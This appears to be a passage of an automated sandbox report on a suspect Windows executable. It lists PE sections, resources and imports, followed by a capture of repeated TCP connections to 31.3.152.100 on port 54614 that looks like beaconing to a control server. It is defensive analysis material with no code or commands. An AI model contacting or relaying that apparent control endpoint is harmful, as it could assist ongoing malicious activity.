IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf3000	0x67b8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xf2000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x5c0c4	0x5c200	False	0.52856014671	data	6.54808365971	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
DATA	0x5e000	0x8e078	0x8e200	False	0.271541062005	data	4.82618080123	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
BSS	0xed000	0xe6d	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0xee000	0x2378	0x2400	False	0.363932291667	data	5.0056698415	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls	0xf1000	0x10	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0xf2000	0x18	0x200	False	0.05078125	data	0.199107517787	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0xf3000	0x67b8	0x6800	False	0.635967548077	data	6.69152272812	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0xfa000	0x5200	0x5200	False	0.32831554878	data	4.78370739432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0xfa774	0x134	data
RT_CURSOR	0xfa8a8	0x134	data
RT_CURSOR	0xfa9dc	0x134	data
RT_CURSOR	0xfab10	0x134	data
RT_CURSOR	0xfac44	0x134	data
RT_CURSOR	0xfad78	0x134	data
RT_CURSOR	0xfaeac	0x134	data
RT_ICON	0xfafe0	0x10a8	data	English	United States
RT_STRING	0xfc088	0x418	data
RT_STRING	0xfc4a0	0x1d8	data
RT_STRING	0xfc678	0x198	data
RT_STRING	0xfc810	0x174	data
RT_STRING	0xfc984	0x254	data
RT_STRING	0xfcbd8	0xe8	data
RT_STRING	0xfccc0	0x24c	data
RT_STRING	0xfcf0c	0x3f4	data
RT_STRING	0xfd300	0x378	data
RT_STRING	0xfd678	0x3e8	data
RT_STRING	0xfda60	0x234	data
RT_STRING	0xfdc94	0xec	data
RT_STRING	0xfdd80	0x1b4	data
RT_STRING	0xfdf34	0x3e4	data
RT_STRING	0xfe318	0x358	data
RT_STRING	0xfe670	0x2b4	data
RT_RCDATA	0xfe924	0x10	data
RT_RCDATA	0xfe934	0x2a8	data
RT_RCDATA	0xfebdc	0x474	Delphi compiled form 'T__3960965291'
RT_GROUP_CURSOR	0xff050	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xff064	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xff078	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xff08c	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xff0a0	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xff0b4	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xff0c8	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_ICON	0xff0dc	0x14	data	English	United States

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
ole32.dll	CreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll	GetErrorInfo, GetActiveObject, SysFreeString
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 22, 2021 22:02:41.518810987 CEST	49745	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:41.670243025 CEST	54614	49745	31.3.152.100	192.168.2.5
Sep 22, 2021 22:02:41.670450926 CEST	49745	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:41.684596062 CEST	49745	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:41.843734980 CEST	54614	49745	31.3.152.100	192.168.2.5
Sep 22, 2021 22:02:43.652630091 CEST	49746	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:43.802486897 CEST	54614	49746	31.3.152.100	192.168.2.5
Sep 22, 2021 22:02:43.802628994 CEST	49746	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:43.868877888 CEST	49746	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:43.957516909 CEST	54614	49746	31.3.152.100	192.168.2.5
Sep 22, 2021 22:02:43.957612991 CEST	49746	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:44.019798040 CEST	54614	49746	31.3.152.100	192.168.2.5
Sep 22, 2021 22:02:45.095340014 CEST	49747	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:45.246356010 CEST	54614	49747	31.3.152.100	192.168.2.5
Sep 22, 2021 22:02:45.262662888 CEST	49747	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:45.277421951 CEST	49747	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:45.423459053 CEST	54614	49747	31.3.152.100	192.168.2.5
Sep 22, 2021 22:02:45.423624039 CEST	49747	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:45.427570105 CEST	54614	49747	31.3.152.100	192.168.2.5
Sep 22, 2021 22:02:46.593067884 CEST	49748	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:49.601759911 CEST	49748	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:49.751851082 CEST	54614	49748	31.3.152.100	192.168.2.5
Sep 22, 2021 22:02:49.756211042 CEST	49748	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:49.764863968 CEST	49748	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:49.912060022 CEST	54614	49748	31.3.152.100	192.168.2.5
Sep 22, 2021 22:02:49.912446022 CEST	49748	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:49.915036917 CEST	54614	49748	31.3.152.100	192.168.2.5
Sep 22, 2021 22:02:51.050214052 CEST	49749	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:51.200608969 CEST	54614	49749	31.3.152.100	192.168.2.5
Sep 22, 2021 22:02:51.200750113 CEST	49749	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:51.208467960 CEST	49749	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:51.364734888 CEST	54614	49749	31.3.152.100	192.168.2.5
Sep 22, 2021 22:02:52.561189890 CEST	49750	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:52.712327957 CEST	54614	49750	31.3.152.100	192.168.2.5
Sep 22, 2021 22:02:52.712508917 CEST	49750	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:52.774564981 CEST	49750	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:52.935156107 CEST	54614	49750	31.3.152.100	192.168.2.5
Sep 22, 2021 22:02:54.104754925 CEST	49751	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:54.358246088 CEST	54614	49751	31.3.152.100	192.168.2.5
Sep 22, 2021 22:02:54.358354092 CEST	49751	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:54.381442070 CEST	49751	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:54.515644073 CEST	54614	49751	31.3.152.100	192.168.2.5
Sep 22, 2021 22:02:54.515759945 CEST	49751	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:54.531817913 CEST	54614	49751	31.3.152.100	192.168.2.5
Sep 22, 2021 22:02:55.818150043 CEST	49752	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:02:58.821127892 CEST	49752	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:04.821624994 CEST	49752	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:19.185935974 CEST	49789	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:19.336206913 CEST	54614	49789	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:19.336333990 CEST	49789	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:19.407010078 CEST	49789	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:19.498042107 CEST	54614	49789	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:19.498171091 CEST	49789	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:19.559201956 CEST	54614	49789	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:20.664808989 CEST	49790	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:20.815874100 CEST	54614	49790	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:20.815980911 CEST	49790	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:20.828154087 CEST	49790	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:20.986835003 CEST	54614	49790	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:22.194843054 CEST	49796	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:22.345140934 CEST	54614	49796	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:22.345339060 CEST	49796	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:22.370060921 CEST	49796	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:22.507148027 CEST	54614	49796	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:22.507755995 CEST	49796	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:22.521570921 CEST	54614	49796	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:23.701766014 CEST	49798	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:26.796524048 CEST	49798	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:26.947434902 CEST	54614	49798	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:26.947937012 CEST	49798	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:26.961420059 CEST	49798	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:27.104187965 CEST	54614	49798	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:27.104393005 CEST	49798	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:27.116705894 CEST	54614	49798	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:28.257308006 CEST	49803	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:28.408652067 CEST	54614	49803	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:28.408768892 CEST	49803	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:28.416001081 CEST	49803	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:28.573143005 CEST	54614	49803	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:29.715133905 CEST	49804	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:29.867316961 CEST	54614	49804	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:29.867746115 CEST	49804	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:29.920300961 CEST	49804	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:30.028064013 CEST	54614	49804	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:30.028187990 CEST	49804	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:30.071768999 CEST	54614	49804	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:31.184942007 CEST	49805	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:31.336097002 CEST	54614	49805	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:31.336229086 CEST	49805	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:31.349098921 CEST	49805	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:31.496341944 CEST	54614	49805	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:31.496409893 CEST	49805	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:31.498585939 CEST	54614	49805	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:32.664578915 CEST	49806	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:32.815227985 CEST	54614	49806	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:32.815409899 CEST	49806	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:32.836488962 CEST	49806	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:33.257126093 CEST	49806	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:33.457995892 CEST	54614	49806	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:33.530011892 CEST	54614	49806	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:34.831188917 CEST	49807	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:34.982136965 CEST	54614	49807	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:34.982253075 CEST	49807	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:35.037009001 CEST	49807	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:35.168209076 CEST	54614	49807	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:35.168781996 CEST	49807	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:35.188067913 CEST	54614	49807	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:37.045742035 CEST	49808	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:37.197112083 CEST	54614	49808	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:37.197232962 CEST	49808	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:37.204263926 CEST	49808	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:37.414366961 CEST	54614	49808	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:37.520375013 CEST	54614	49808	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:38.677305937 CEST	49809	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:38.828571081 CEST	54614	49809	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:38.830871105 CEST	49809	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:38.840956926 CEST	49809	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:38.991277933 CEST	54614	49809	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:40.142869949 CEST	49810	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:40.293162107 CEST	54614	49810	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:40.293343067 CEST	49810	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:40.305239916 CEST	49810	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:40.463906050 CEST	54614	49810	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:41.613188028 CEST	49811	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:41.764065027 CEST	54614	49811	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:41.764249086 CEST	49811	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:41.775391102 CEST	49811	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:41.945442915 CEST	54614	49811	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:43.138642073 CEST	49812	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:46.139537096 CEST	49812	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:46.291194916 CEST	54614	49812	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:46.291338921 CEST	49812	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:46.298891068 CEST	49812	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:46.463501930 CEST	54614	49812	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:47.642512083 CEST	49813	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:47.792701960 CEST	54614	49813	31.3.152.100	192.168.2.5
Sep 22, 2021 22:03:47.792845011 CEST	49813	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:47.803246021 CEST	49813	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:03:48.000751019 CEST	54614	49813	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:00.425709009 CEST	54614	49813	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:01.607640982 CEST	49824	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:01.758291006 CEST	54614	49824	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:01.758857012 CEST	49824	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:01.765574932 CEST	49824	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:01.982599974 CEST	54614	49824	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:03.538762093 CEST	54614	49824	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:04.685161114 CEST	49825	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:04.836900949 CEST	54614	49825	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:04.837166071 CEST	49825	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:04.846353054 CEST	49825	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:04.997472048 CEST	54614	49825	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:04.997517109 CEST	54614	49825	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:04.997601986 CEST	49825	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:06.139062881 CEST	49826	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:06.290996075 CEST	54614	49826	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:06.291131973 CEST	49826	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:06.302906036 CEST	49826	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:06.735124111 CEST	49826	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:06.930368900 CEST	54614	49826	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:07.019849062 CEST	54614	49826	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:08.170516014 CEST	49827	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:08.322829962 CEST	54614	49827	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:08.322952986 CEST	49827	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:08.345750093 CEST	49827	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:08.529122114 CEST	54614	49827	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:09.335834026 CEST	54614	49827	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:10.484236956 CEST	49828	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:10.635855913 CEST	54614	49828	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:10.635978937 CEST	49828	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:10.653352022 CEST	49828	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:10.793344975 CEST	54614	49828	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:10.793735981 CEST	49828	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:10.803992033 CEST	54614	49828	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:11.934890985 CEST	49829	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:12.085365057 CEST	54614	49829	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:12.087558985 CEST	49829	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:12.103131056 CEST	49829	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:12.243437052 CEST	54614	49829	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:12.247605085 CEST	49829	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:12.254542112 CEST	54614	49829	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:13.826776981 CEST	49830	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:13.976883888 CEST	54614	49830	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:13.977004051 CEST	49830	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:13.984566927 CEST	49830	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:14.134413958 CEST	54614	49830	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:14.135061979 CEST	49830	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:14.407783985 CEST	49830	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:14.907641888 CEST	49830	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:15.059652090 CEST	54614	49830	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:15.275247097 CEST	49831	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:15.427892923 CEST	54614	49831	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:15.428020954 CEST	49831	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:15.438147068 CEST	49831	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:15.585520983 CEST	54614	49831	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:15.585675001 CEST	49831	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:15.589533091 CEST	54614	49831	31.3.152.100	192.168.2.5
